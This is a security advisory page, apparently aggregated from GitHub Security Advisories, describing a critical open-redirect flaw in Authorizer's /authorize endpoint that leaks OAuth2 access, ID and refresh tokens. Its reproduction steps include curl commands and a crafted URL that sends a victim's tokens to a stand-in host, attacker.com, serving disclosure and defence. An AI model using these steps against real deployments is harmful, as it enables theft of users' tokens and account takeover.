CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-h29v-hj44-q8cv: Authorizer: Unvalidated redirect_uri in /authorize leaks OAuth2 tokens to attacker-controlled URL

criticalCVSS 9.3CVE-2026-54072
Summary The /authorize endpoint accepts any redirect_uri without validating it against AllowedOrigins. When response_type=token or response_type=id_token, the server appends access_token, id_token, and refresh_token as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required client_id from the public /graphql?query={meta{client_id}} endpoint. Partial fix was applied in v2.0.1 to other handlers (oauth_login, verify_email, magic_link_login, forgot_password, invite_members, oauth_callback) but /authorize was not included. Vulnerable Code internal/http_handlers/authorize.go: redirectURI := strings.TrimSpace(gc.Query("redirect_uri")) // ... no IsValidOrigin() call ... // response_type=token path (line ~263): if strings.Contains(redirectURI, "?") { redirectURI = redirectURI + "&" + params } else { redirectURI = redirectURI + "?" + params } handleResponse(gc, responseMode, authURL, redirectURI, ...) // 302 to attacker URL Compare with the fixed oauth_login.go in v2.0.1 which calls validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins). Steps to Reproduce 1. Obtain client_id (no authentication required) CLIENT_ID=$(curl -s http://TARGET/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{meta{client_id}}"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['meta']['client_id'])") echo "client_id: $CLIENT_ID" 2. Craft the malicious URL and send to victim (victim must be logged in) When victim opens this URL, tokens are delivered to attacker.com MALICIOUS_URL="http://TARGET/authorize?response_type=token&client_id=${CLIENT_ID}&redirect_uri=https://attacker.com/steal&scope=openid+profile+email&state=x&response_mode=query" echo "Send to victim: $MALICIOUS_URL" 3. Attacker receives 302 redirect with all tokens: https://attacker.com/steal?access_token=eyJ...&token_type=bearer&expires_in=...&id_token=eyJ... 4. Validate stolen token curl -s http://TARGET/userinfo \ -H

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
critical — CVSS 9.3
Published
2026-07-10
Last updated
2026-07-10
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-h29v-hj44-q8cv

Referenced CVEs

CVECSIRTS overviewExternal
CVE-2026-54072coverage & exploitation statusNVD · CVE.org

More from GitHub Security Advisories